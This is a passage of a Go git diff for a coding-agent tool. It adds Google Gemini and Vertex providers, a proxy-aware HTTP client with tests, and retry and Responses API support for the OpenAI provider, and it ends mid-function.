+	p := NewGeminiProviderWithModels("fake-key", "https://generativelanguage.googleapis.com/v1beta/models", []*provider.Model{{ID: "gemini-test"}})
+	p.SetCachedContent("cachedContents/test-cache")
+	p = newMockGoogleProvider(t, p, "data: {}\n", bodyCh, nil)
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:  "gemini-test",
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}) {
+	}
+
+	var req googleRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+
+	if req.CachedContent != "cachedContents/test-cache" {
+		t.Fatalf("cachedContent = %q, want cachedContents/test-cache", req.CachedContent)
+	}
+}
+
+func TestGoogleVertexAuthorizationHeader(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockGoogleProvider(t,
+		NewVertexProviderWithModels("fake-token", "https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models", []*provider.Model{{ID: "gemini-test"}}),
+		"data: {}\n",
+		bodyCh,
+		func(r *http.Request) {
+			if r.URL.Path != "/v1/projects/test/locations/global/publishers/google/models/gemini-test:streamGenerateContent" {
+				t.Fatalf("path = %q, want Vertex streamGenerateContent path", r.URL.Path)
+			}
+			if r.Header.Get("Authorization") != "Bearer fake-token" {
+				t.Fatalf("Authorization = %q, want Bearer fake-token", r.Header.Get("Authorization"))
+			}
+		})
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:  "gemini-test",
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}) {
+	}
+}
+
+func TestGoogleStreamTextThinkToolCallAndUsage(t *testing.T) {
+	sse := "data: {\"candidates\":[{\"content\":{\"parts\":[{\"text\":\"thinking\",\"thought\":true,\"thoughtSignature\":\"sig-1\"},{\"text\":\"Hello \"}]}}]}\n" +
+		"data: {\"candidates\":[{\"content\":{\"parts\":[{\"functionCall\":{\"name\":\"read\",\"args\":{\"path\":\"main.go\"}}}]},\"finishReason\":\"STOP\"}],\"usageMetadata\":{\"promptTokenCount\":10,\"candidatesTokenCount\":5,\"thoughtsTokenCount\":2,\"cachedContentTokenCount\":7,\"totalTokenCount\":17}}\n"
+	p := newMockGoogleProvider(t,
+		NewGeminiProviderWithModels("fake-key", "https://generativelanguage.googleapis.com/v1beta/models", []*provider.Model{{ID: "gemini-test"}}),
+		sse,
+		nil,
+		nil)
+
+	var text string
+	var think string
+	var thinkSignature string
+	var tool *provider.ToolCallBlock
+	var usage *provider.Usage
+	var done bool
+	for ev := range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:  "gemini-test",
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}) {
+		switch ev.Type {
+		case provider.StreamTextDelta:
+			text += ev.TextDelta
+		case provider.StreamThinkDelta:
+			think += ev.ThinkDelta
+		case provider.StreamThinkSignature:
+			thinkSignature = ev.ThinkSignature
+		case provider.StreamToolCall:
+			tool = ev.ToolCall
+		case provider.StreamUsage:
+			usage = ev.Usage
+		case provider.StreamDone:
+			done = true
+			if ev.StopReason != "stop" {
+				t.Fatalf("stop reason = %q, want stop", ev.StopReason)
+			}
+		}
+	}
+	if text != "Hello " {
+		t.Fatalf("text = %q, want Hello", text)
+	}
+	if think != "thinking" {
+		t.Fatalf("think = %q, want thinking", think)
+	}
+	if thinkSignature != "sig-1" {
+		t.Fatalf("thinkSignature = %q, want sig-1", thinkSignature)
+	}
+	if tool == nil || tool.Name != "read" || string(tool.Arguments) != `{"path":"main.go"}` {
+		t.Fatalf("tool = %#v, want read path", tool)
+	}
+	if usage == nil || usage.Input != 10 || usage.Output != 5 || usage.Reasoning != 2 || usage.CacheRead != 7 || usage.TotalTokens != 17 {
+		t.Fatalf("usage = %#v, want token counts", usage)
+	}
+	if !done {
+		t.Fatal("missing StreamDone")
+	}
+}
diff --git a/internal/provider/google/register.go b/internal/provider/google/register.go
new file mode 100644
index 0000000..1f9ec7e
--- /dev/null
+++ b/internal/provider/google/register.go
@@ -0,0 +1,116 @@
+package google
+
+import (
+	"os"
+	"os/exec"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/platform"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+)
+
+func init() {
+	provider.Register("google-gemini", func(cfg *config.ProviderConfig) (provider.Provider, error) {
+		if cfg == nil {
+			return NewGeminiProvider("", ""), nil
+		}
+		return NewGeminiProviderWithModelsAndProxy(resolveAPIKey(cfg), cfg.BaseURL, cfg.HTTPProxy, convertModels("google-gemini", cfg.Models))
+	})
+	provider.Register("google-vertex", func(cfg *config.ProviderConfig) (provider.Provider, error) {
+		if cfg == nil {
+			return NewVertexProvider("", ""), nil
+		}
+		return NewVertexProviderWithModelsAndProxy(resolveAPIKey(cfg), cfg.BaseURL, cfg.HTTPProxy, convertModels("google-vertex", cfg.Models))
+	})
+}
+
+func resolveAPIKey(cfg *config.ProviderConfig) string {
+	if cfg == nil {
+		return ""
+	}
+	key := cfg.APIKey
+	if strings.HasPrefix(key, "!") {
+		if os.Getenv("VIBECODING_ALLOW_SHELL_CONFIG") != "1" {
+			return key
+		}
+		return resolveProviderShellCommand(key[1:])
+	}
+	if strings.HasPrefix(key, "${") && strings.HasSuffix(key, "}") {
+		return os.Getenv(key[2 : len(key)-1])
+	}
+	return key
+}
+
+func resolveProviderShellCommand(cmd string) string {
+	if cmd == "" {
+		return ""
+	}
+	var out []byte
+	var err error
+	if platform.IsWindows() {
+		out, err = exec.Command("powershell.exe", "-NoProfile", "-NonInteractive", "-Command", cmd).Output()
+	} else {
+		out, err = exec.Command("sh", "-c", cmd).Output()
+	}
+	if err != nil {
+		return ""
+	}
+	return strings.TrimSpace(string(out))
+}
+
+func convertModels(providerName string, models []config.ModelConfig) []*provider.Model {
+	if len(models) == 0 {
+		return DefaultModels(providerName)
+	}
+	result := make([]*provider.Model, 0, len(models))
+	for _, m := range models {
+		input := m.Input
+		if len(input) == 0 {
+			input = []string{"text", "image"}
+		}
+		result = append(result, &provider.Model{
+			ID:            m.ID,
+			Name:          m.Name,
+			Provider:      providerName,
+			Reasoning:     m.Reasoning,
+			Input:         input,
+			ContextWindow: m.ContextWindow,
+			MaxTokens:     m.MaxTokens,
+			Temperature:   m.Temperature,
+			TopP:          m.TopP,
+			Compat:        toCompat(m.Compat),
+		})
+	}
+	return result
+}
+
+func toCompat(c *config.ModelCompat) *provider.ModelCompat {
+	if c == nil {
+		return nil
+	}
+	return &provider.ModelCompat{
+		ThinkingFormat:                      c.ThinkingFormat,
+		RequiresReasoningContentOnAssistant: c.RequiresReasoningContentOnAssistant || c.RequiresReasoningContentOnAssistantMessages,
+		ForceAdaptiveThinking:               c.ForceAdaptiveThinking,
+		SupportsDeveloperRole:               cloneBool(c.SupportsDeveloperRole),
+		SupportsStore:                       cloneBool(c.SupportsStore),
+		SupportsReasoningEffort:             cloneBool(c.SupportsReasoningEffort),
+		SupportsStrictMode:                  cloneBool(c.SupportsStrictMode),
+		MaxTokensField:                      c.MaxTokensField,
+		SupportsCacheControlOnTools:         cloneBool(c.SupportsCacheControlOnTools),
+		SupportsLongCacheRetention:          cloneBool(c.SupportsLongCacheRetention),
+		SupportsPromptCacheKey:              cloneBool(c.SupportsPromptCacheKey),
+		SupportsReasoningSummary:            cloneBool(c.SupportsReasoningSummary),
+		SendSessionAffinityHeaders:          c.SendSessionAffinityHeaders,
+		SupportsEagerToolInputStreaming:     cloneBool(c.SupportsEagerToolInputStreaming),
+	}
+}
+
+func cloneBool(v *bool) *bool {
+	if v == nil {
+		return nil
+	}
+	c := *v
+	return &c
+}
diff --git a/internal/provider/hosted_tools.go b/internal/provider/hosted_tools.go
new file mode 100644
index 0000000..74294d9
--- /dev/null
+++ b/internal/provider/hosted_tools.go
@@ -0,0 +1,22 @@
+package provider
+
+const (
+	HostedToolWebSearch                  = "web_search"
+	HostedToolWebSearchAnthropicMessages = "web_search_20250305"
+)
+
+// HostedWebSearchToolType maps a hosted web_search tool to the provider-specific wire type.
+// It is provider-neutral: the mapping depends on the tool's API family, not the vendor name.
+func HostedWebSearchToolType(providerType, name string) string {
+	if name != HostedToolWebSearch {
+		return ""
+	}
+	switch providerType {
+	case "responses":
+		return HostedToolWebSearch
+	case "messages":
+		return HostedToolWebSearchAnthropicMessages
+	default:
+		return ""
+	}
+}
diff --git a/internal/provider/hosted_tools_test.go b/internal/provider/hosted_tools_test.go
new file mode 100644
index 0000000..30e965e
--- /dev/null
+++ b/internal/provider/hosted_tools_test.go
@@ -0,0 +1,24 @@
+package provider
+
+import "testing"
+
+func TestHostedWebSearchToolType(t *testing.T) {
+	tests := []struct {
+		name         string
+		providerType string
+		toolName     string
+		want         string
+	}{
+		{name: "responses web search", providerType: "responses", toolName: "web_search", want: "web_search"},
+		{name: "messages web search", providerType: "messages", toolName: "web_search", want: "web_search_20250305"},
+		{name: "unknown tool", providerType: "responses", toolName: "other", want: ""},
+		{name: "unknown provider type", providerType: "other", toolName: "web_search", want: ""},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := HostedWebSearchToolType(tt.providerType, tt.toolName); got != tt.want {
+				t.Fatalf("HostedWebSearchToolType(%q, %q) = %q, want %q", tt.providerType, tt.toolName, got, tt.want)
+			}
+		})
+	}
+}
diff --git a/internal/provider/http_client.go b/internal/provider/http_client.go
new file mode 100644
index 0000000..7dc7e5d
--- /dev/null
+++ b/internal/provider/http_client.go
@@ -0,0 +1,27 @@
+package provider
+
+import (
+	"fmt"
+	"net/http"
+	"net/url"
+	"strings"
+	"time"
+)
+
+// NewHTTPClient returns a provider HTTP client. Empty proxyURL preserves the
+// default environment proxy behavior from http.Transport.
+func NewHTTPClient(timeout time.Duration, proxyURL string) (*http.Client, error) {
+	transport := http.DefaultTransport.(*http.Transport).Clone()
+	proxyURL = strings.TrimSpace(proxyURL)
+	if proxyURL != "" {
+		u, err := url.Parse(proxyURL)
+		if err != nil {
+			return nil, err
+		}
+		if u.Scheme == "" || u.Host == "" {
+			return nil, fmt.Errorf("proxy URL must include scheme and host")
+		}
+		transport.Proxy = http.ProxyURL(u)
+	}
+	return &http.Client{Timeout: timeout, Transport: transport}, nil
+}
diff --git a/internal/provider/http_client_test.go b/internal/provider/http_client_test.go
new file mode 100644
index 0000000..b142561
--- /dev/null
+++ b/internal/provider/http_client_test.go
@@ -0,0 +1,48 @@
+package provider
+
+import (
+	"net/http"
+	"net/url"
+	"testing"
+	"time"
+)
+
+func TestNewHTTPClientDefaultProxy(t *testing.T) {
+	client, err := NewHTTPClient(time.Second, "")
+	if err != nil {
+		t.Fatalf("NewHTTPClient: %v", err)
+	}
+	transport, ok := client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", client.Transport)
+	}
+	if transport.Proxy == nil {
+		t.Fatal("expected default environment proxy function")
+	}
+}
+
+func TestNewHTTPClientExplicitProxy(t *testing.T) {
+	client, err := NewHTTPClient(time.Second, " http://127.0.0.1:7890 ")
+	if err != nil {
+		t.Fatalf("NewHTTPClient: %v", err)
+	}
+	transport, ok := client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", client.Transport)
+	}
+	proxyURL, err := transport.Proxy(&http.Request{URL: &url.URL{Scheme: "https", Host: "api.test"}})
+	if err != nil {
+		t.Fatalf("proxy lookup: %v", err)
+	}
+	if proxyURL == nil || proxyURL.String() != "http://127.0.0.1:7890" {
+		t.Fatalf("proxy = %v, want http://127.0.0.1:7890", proxyURL)
+	}
+}
+
+func TestNewHTTPClientRejectsInvalidProxy(t *testing.T) {
+	for _, proxyURL := range []string{"http://[::1", "127.0.0.1:7890", "http://"} {
+		if _, err := NewHTTPClient(time.Second, proxyURL); err == nil {
+			t.Fatalf("expected error for proxy URL %q", proxyURL)
+		}
+	}
+}
diff --git a/internal/provider/mock.go b/internal/provider/mock.go
index 425a0ad..bf6edaf 100644
--- a/internal/provider/mock.go
+++ b/internal/provider/mock.go
@@ -27,6 +27,13 @@ func (p *MockProvider) Chat(ctx context.Context, params ChatParams) <-chan Strea
 		defer close(ch)
 		p.callCount++
 
+		select {
+		case <-ctx.Done():
+			ch <- StreamEvent{Type: StreamError, Error: ctx.Err()}
+			return
+		default:
+		}
+
 		for _, event := range p.responses {
 			select {
 			case <-ctx.Done():
diff --git a/internal/provider/openai/provider.go b/internal/provider/openai/provider.go
index e3298fc..923fc5e 100644
--- a/internal/provider/openai/provider.go
+++ b/internal/provider/openai/provider.go
@@ -12,6 +12,7 @@ import (
 	"strings"
 	"time"
 
+	"github.com/startvibecoding/vibecoding/internal/config"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 	"github.com/startvibecoding/vibecoding/internal/ua"
 )
@@ -25,7 +26,19 @@ type Provider struct {
 
 	// Configuration options
 	disableReasoning bool   // Disable reasoning_content support for incompatible APIs
-	thinkingFormat   string // "", "openai", "xiaomi"
+	thinkingFormat   string // "", "openai", "deepseek", "xiaomi"
+	useResponsesAPI  bool
+	responsesConfig  *responsesConfig
+
+	// Retry configuration
+	retryConfig *provider.RetryConfig
+}
+
+type responsesConfig struct {
+	reasoningSummary     string
+	promptCacheEnabled   bool
+	promptCacheKey       string
+	promptCacheRetention string
 }
 
 // DefaultModels returns the default OpenAI model list.
@@ -61,6 +74,22 @@ func NewProvider(apiKey, baseURL string) *Provider {
 
 // NewProviderWithModels creates a new OpenAI provider with custom models.
 func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Provider {
+	p, err := NewProviderWithModelsAndProxy(apiKey, baseURL, "", models)
+	if err != nil {
+		return newProviderWithHTTPClient(apiKey, baseURL, models, &http.Client{Timeout: 30 * time.Minute})
+	}
+	return p
+}
+
+func NewProviderWithModelsAndProxy(apiKey, baseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	client, err := provider.NewHTTPClient(30*time.Minute, proxyURL)
+	if err != nil {
+		return nil, fmt.Errorf("configure http proxy: %w", err)
+	}
+	return newProviderWithHTTPClient(apiKey, baseURL, models, client), nil
+}
+
+func newProviderWithHTTPClient(apiKey, baseURL string, models []*provider.Model, client *http.Client) *Provider {
 	if baseURL == "" {
 		baseURL = "https://api.openai.com/v1"
 	}
@@ -72,7 +101,11 @@ func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Pr
 		BaseProvider: provider.NewBaseProvider("openai", models),
 		apiKey:       apiKey,
 		baseURL:      strings.TrimRight(baseURL, "/"),
-		client:       &http.Client{Timeout: 30 * time.Minute},
+		client:       client,
+		responsesConfig: &responsesConfig{
+			reasoningSummary:   "auto",
+			promptCacheEnabled: true,
+		},
 	}
 
 	// Check environment variable to disable reasoning
@@ -83,32 +116,56 @@ func NewProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Pr
 	return p
 }
 
+// SetUseResponsesAPI switches the provider to the Responses API.
+func (p *Provider) SetUseResponsesAPI(enabled bool) {
+	p.useResponsesAPI = enabled
+}
+
+// SetResponsesConfig applies Responses API-specific configuration.
+func (p *Provider) SetResponsesConfig(cfg config.ResponsesConfig) {
+	p.responsesConfig = &responsesConfig{
+		reasoningSummary:     cfg.ReasoningSummary,
+		promptCacheEnabled:   cfg.PromptCacheEnabled == nil || *cfg.PromptCacheEnabled,
+		promptCacheKey:       cfg.PromptCacheKey,
+		promptCacheRetention: cfg.PromptCacheRetention,
+	}
+}
+
 // DisableReasoning disables reasoning_content support for incompatible APIs.
 func (p *Provider) DisableReasoning() {
 	p.disableReasoning = true
 }
 
+// SetRetryConfig sets the retry configuration for this provider.
+func (p *Provider) SetRetryConfig(cfg *provider.RetryConfig) {
+	p.retryConfig = cfg
+}
+
 // IsReasoningDisabled returns whether reasoning support is disabled.
 func (p *Provider) IsReasoningDisabled() bool {
 	return p.disableReasoning
 }
 
 // SetThinkingFormat sets the thinking parameter format.
-// "openai" = reasoning_effort, "xiaomi" = thinking: {type: enabled}
+// "openai" = reasoning_effort, "deepseek" = thinking + reasoning_effort,
+// "xiaomi" = legacy thinking-only format.
 func (p *Provider) SetThinkingFormat(format string) {
 	p.thinkingFormat = format
 }
 
 // openAIRequest represents the request body for OpenAI Chat Completions.
 type openAIRequest struct {
-	Model           string          `json:"model"`
-	Messages        []openAIMessage `json:"messages"`
-	Tools           []openAITool    `json:"tools,omitempty"`
-	MaxTokens       int             `json:"max_tokens,omitempty"`
-	Stream          bool            `json:"stream"`
-	StreamOptions   *streamOptions  `json:"stream_options,omitempty"`
-	ReasoningEffort string          `json:"reasoning_effort,omitempty"`
-	Thinking        *thinkingConfig `json:"thinking,omitempty"`
+	Model               string          `json:"model"`
+	Messages            []openAIMessage `json:"messages"`
+	Tools               []openAITool    `json:"tools,omitempty"`
+	MaxTokens           int             `json:"max_tokens,omitempty"`
+	MaxCompletionTokens int             `json:"max_completion_tokens,omitempty"`
+	Temperature         *float64        `json:"temperature,omitempty"`
+	TopP                *float64        `json:"top_p,omitempty"`
+	Stream              bool            `json:"stream"`
+	StreamOptions       *streamOptions  `json:"stream_options,omitempty"`
+	ReasoningEffort     string          `json:"reasoning_effort,omitempty"`
+	Thinking            *thinkingConfig `json:"thinking,omitempty"`
 }
 
 type thinkingConfig struct {
@@ -122,7 +179,7 @@ type streamOptions struct {
 type openAIMessage struct {
 	Role       string           `json:"role"`
 	Content    interface{}      `json:"content"`
-	Reasoning  string           `json:"reasoning_content,omitempty"`
+	Reasoning  *string          `json:"reasoning_content,omitempty"`
 	ToolCalls  []openAIToolCall `json:"tool_calls,omitempty"`
 	ToolCallID string           `json:"tool_call_id,omitempty"`
 	Name       string           `json:"name,omitempty"`
@@ -192,6 +249,13 @@ type openAIUsageResponse struct {
 
 // Chat implements the streaming chat interface.
 func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	if p.useResponsesAPI {
+		return p.chatResponses(ctx, params)
+	}
+	return p.chatCompletions(ctx, params)
+}
+
+func (p *Provider) chatCompletions(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
 	ch := make(chan provider.StreamEvent, 100)
 
 	go func() {
@@ -202,9 +266,6 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 			return
 		}
 
-		messages := p.convertMessages(params)
-		tools := p.convertTools(params.Tools)
-
 		modelID := params.ModelID
 		if modelID == "" {
 			if len(p.Models()) > 0 {
@@ -218,38 +279,44 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 		if maxTokens == 0 {
 			maxTokens = 16384
 		}
+		model := p.GetModel(modelID)
+		messages := p.convertMessages(params, p.requiresReasoningContentOnAssistant(model))
+		tools := p.convertTools(params.Tools)
 
 		reqBody := openAIRequest{
 			Model:         modelID,
 			Messages:      messages,
 			Tools:         tools,
-			MaxTokens:     maxTokens,
 			Stream:        true,
 			StreamOptions: &streamOptions{IncludeUsage: true},
+			Temperature:   params.Temperature,
+			TopP:          params.TopP,
+		}
+		if maxTokensField(model) == "max_completion_tokens" {
+			reqBody.MaxCompletionTokens = maxTokens
+		} else {
+			reqBody.MaxTokens = maxTokens
 		}
 
-		model := p.GetModel(modelID)
 		if !p.disableReasoning && params.ThinkingLevel != provider.ThinkingOff && model != nil && model.Reasoning {
 			// Determine thinking format: explicit config > URL auto-detect > default
-			format := p.thinkingFormat
-			if format == "" && strings.Contains(p.baseURL, "xiaomimimo") {
-				format = "xiaomi"
-			}
+			format := p.thinkingFormatForModel(model)
 			switch format {
+			case "deepseek":
+				reqBody.Thinking = &thinkingConfig{Type: "enabled"}
+				if supportsReasoningEffort(model) {
+					reqBody.ReasoningEffort = deepseekReasoningEffort(params.ThinkingLevel)
+				}
 			case "xiaomi":
 				reqBody.Thinking = &thinkingConfig{Type: "enabled"}
 			default: // "openai" or ""
-				switch params.ThinkingLevel {
-				case provider.ThinkingMinimal, provider.ThinkingLow:
-					reqBody.ReasoningEffort = "low"
-				case provider.ThinkingMedium:
-					reqBody.ReasoningEffort = "medium"
-				case provider.ThinkingHigh, provider.ThinkingXHigh:
-					reqBody.ReasoningEffort = "high"
+				if supportsReasoningEffort(model) {
+					reqBody.ReasoningEffort = openAIReasoningEffort(params.ThinkingLevel)
 				}
 			}
 		}
 
+		// Build the request body once (reused across retries)
 		body, err := json.Marshal(reqBody)
 		if err != nil {
 			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("marshal request: %w", err)}
@@ -261,30 +328,83 @@ func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan
 			fmt.Fprintf(os.Stderr, "[DEBUG] Request body: %s\n", string(body))
 		}
 
-		req, err := http.NewRequestWithContext(ctx, "POST", p.baseURL+"/chat/completions", bytes.NewReader(body))
-		if err != nil {
-			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("create request: %w", err)}
-			return
+		// Retry loop: retries only the initial HTTP connection, not the SSE stream.
+		maxRetries := 0
+		baseDelayMs := 2000
+		if p.retryConfig != nil && p.retryConfig.Enabled {
+			maxRetries = p.retryConfig.MaxRetries
+			baseDelayMs = p.retryConfig.BaseDelayMs
 		}
-		req.Header.Set("Content-Type", "application/json")
-		req.Header.Set("Authorization", "Bearer "+p.apiKey)
-		req.Header.Set("Accept", "text/event-stream")
-		req.Header.Set("User-Agent", ua.ProviderUserAgent())
 
-		resp, err := p.client.Do(req)
-		if err != nil {
-			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("send request: %w", err)}
-			return
-		}
-		defer resp.Body.Close()
+		for attempt := 0; attempt <= maxRetries; attempt++ {
+			if err := ctx.Err(); err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: err, StopReason: "aborted"}
+				return
+			}
+
+			req, err := http.NewRequestWithContext(ctx, "POST", p.baseURL+"/chat/completions", bytes.NewReader(body))
+			if err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("create request: %w", err)}
+				return
+			}
+			req.Header.Set("Content-Type", "application/json")
+			req.Header.Set("Authorization", "Bearer "+p.apiKey)
+			req.Header.Set("Accept", "text/event-stream")
+			req.Header.Set("User-Agent", ua.ProviderUserAgent())
+
+			resp, err := p.client.Do(req)
+			if err != nil {
+				if attempt < maxRetries && provider.IsRetryable(err, 0) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{
+						Type:         provider.StreamRetry,
+						RetryAttempt: attempt + 1,
+						RetryMax:     maxRetries,
+						Error:        fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, err)),
+					}
+					select {
+					case <-ctx.Done():
+						ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+						return
+					case <-time.After(delay):
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("send request: %w", err)}
+				return
+			}
+
+			if resp.StatusCode != http.StatusOK {
+				bodyBytes, _ := io.ReadAll(resp.Body)
+				resp.Body.Close()
+				if attempt < maxRetries && provider.IsRetryable(nil, resp.StatusCode) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{
+						Type:         provider.StreamRetry,
+						RetryAttempt: attempt + 1,
+						RetryMax:     maxRetries,
+						Error:        fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(bodyBytes)))),
+					}
+					select {
+					case <-ctx.Done():
+						ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+						return
+					case <-time.After(delay):
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("API error %d: %s", resp.StatusCode, string(bodyBytes))}
+				return
+			}
 
-		if resp.StatusCode != http.StatusOK {
-			bodyBytes, _ := io.ReadAll(resp.Body)
-			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("API error %d: %s", resp.StatusCode, string(bodyBytes))}
+			// Success: stream the SSE response. No retry once streaming starts.
+			p.parseSSE(ctx, resp.Body, ch, params)
+			resp.Body.Close()
 			return
 		}
 
-		p.parseSSE(ctx, resp.Body, ch, params)
+		// All retries exhausted (should not reach here with for..break logic, but safety net)
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("all %d retry attempts exhausted", maxRetries)}
 	}()
 
 	return ch
@@ -295,8 +415,6 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 	scanner.Buffer(make([]byte, 1024*1024), 1024*1024)
 
 	var (
-		textContent     string
-		reasonContent   string
 		toolCalls       []provider.ToolCallBlock
 		toolCallBuffers = make(map[int]*strings.Builder)
 		stopReason      string
@@ -331,40 +449,14 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 		}
 
 		if chunk.Usage != nil {
-			// Only update usage if not already set (to avoid overwriting with partial values from different chunks)
-			if usage == nil {
-				usage = &provider.Usage{
-					Input:       chunk.Usage.PromptTokens,
-					Output:      chunk.Usage.CompletionTokens,
-					TotalTokens: chunk.Usage.TotalTokens,
-				}
-				if chunk.Usage.PromptTokensDetails != nil {
-					usage.CacheRead = chunk.Usage.PromptTokensDetails.CachedTokens
-				}
-			} else {
-				// Update only if new values are provided and current values are 0
-				if chunk.Usage.PromptTokens > 0 && usage.Input == 0 {
-					usage.Input = chunk.Usage.PromptTokens
-				}
-				if chunk.Usage.CompletionTokens > 0 && usage.Output == 0 {
-					usage.Output = chunk.Usage.CompletionTokens
-				}
-				if chunk.Usage.TotalTokens > 0 && usage.TotalTokens == 0 {
-					usage.TotalTokens = chunk.Usage.TotalTokens
-				}
-				if chunk.Usage.PromptTokensDetails != nil && chunk.Usage.PromptTokensDetails.CachedTokens > 0 && usage.CacheRead == 0 {
-					usage.CacheRead = chunk.Usage.PromptTokensDetails.CachedTokens
-				}
-			}
+			mergeOpenAIUsage(&usage, chunk.Usage)
 		}
 
 		for _, choice := range chunk.Choices {
 			if choice.Delta.Content != "" {
-				textContent += choice.Delta.Content
 				ch <- provider.StreamEvent{Type: provider.StreamTextDelta, TextDelta: choice.Delta.Content}
 			}
 			if !p.disableReasoning && choice.Delta.Reasoning != nil && *choice.Delta.Reasoning != "" {
-				reasonContent += *choice.Delta.Reasoning
 				ch <- provider.StreamEvent{Type: provider.StreamThinkDelta, ThinkDelta: *choice.Delta.Reasoning}
 			}
 			for _, tc := range choice.Delta.ToolCalls {
@@ -374,7 +466,6 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 				}
 				if _, ok := toolCallBuffers[idx]; !ok {
 					toolCallBuffers[idx] = &strings.Builder{}
-					// Ensure slice is long enough
 					for len(toolCalls) <= idx {
 						toolCalls = append(toolCalls, provider.ToolCallBlock{})
 					}
@@ -406,8 +497,6 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 		if buf, ok := toolCallBuffers[i]; ok {
 			if tc.ID == "" {
 				// Some OpenAI-compatible providers omit tool call IDs in stream deltas.
-				// Generate a stable fallback ID so subsequent tool results can always
-				// bind to the corresponding assistant tool call.
 				tc.ID = fmt.Sprintf("toolcall_%d", i)
 			}
 			tc.Arguments = json.RawMessage(buf.String())
@@ -422,7 +511,97 @@ func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provi
 	ch <- provider.StreamEvent{Type: provider.StreamDone, StopReason: stopReason}
 }
 
-func (p *Provider) convertMessages(params provider.ChatParams) []openAIMessage {
+func mergeOpenAIUsage(dst **provider.Usage, src *openAIUsageResponse) {
+	if src == nil {
+		return
+	}
+	if *dst == nil {
+		*dst = &provider.Usage{
+			Input:       src.PromptTokens,
+			Output:      src.CompletionTokens,
+			TotalTokens: src.TotalTokens,
+		}
+		if src.PromptTokensDetails != nil {
+			(*dst).CacheRead = src.PromptTokensDetails.CachedTokens
+		}
+		return
+	}
+	if src.PromptTokens > 0 && (*dst).Input == 0 {
+		(*dst).Input = src.PromptTokens
+	}
+	if src.CompletionTokens > 0 && (*dst).Output == 0 {
+		(*dst).Output = src.CompletionTokens
+	}
+	if src.TotalTokens > 0 && (*dst).TotalTokens == 0 {
+		(*dst).TotalTokens = src.TotalTokens
+	}
+	if src.PromptTokensDetails != nil && src.PromptTokensDetails.CachedTokens > 0 && (*dst).CacheRead == 0 {
+		(*dst).CacheRead = src.PromptTokensDetails.CachedTokens
+	}
+}
+
+func openAIReasoningEffort(level provider.ThinkingLevel) string {
+	switch level {
+	case provider.ThinkingMinimal, provider.ThinkingLow:
+		return "low"
+	case provider.ThinkingMedium:
+		return "medium"
+	case provider.ThinkingHigh, provider.ThinkingXHigh:
+		return "high"
+	default:
+		return ""
+	}
+}
+
+func deepseekReasoningEffort(level provider.ThinkingLevel) string {
+	switch level {
+	case provider.ThinkingXHigh:
+		return "max"
+	default:
+		return "high"
+	}
+}
+
+func (p *Provider) thinkingFormatForModel(model *provider.Model) string {
+	if p.thinkingFormat != "" {
+		return p.thinkingFormat
+	}
+	if model != nil && model.Compat != nil && model.Compat.ThinkingFormat != "" {
+		return model.Compat.ThinkingFormat
+	}
+	lowerBaseURL := strings.ToLower(p.baseURL)
+	if strings.Contains(lowerBaseURL, "deepseek") {
+		return "deepseek"
+	}
+	if strings.Contains(lowerBaseURL, "xiaomimimo") {
+		return "xiaomi"
+	}
+	return ""
+}
+
+func supportsReasoningEffort(model *provider.Model) bool {
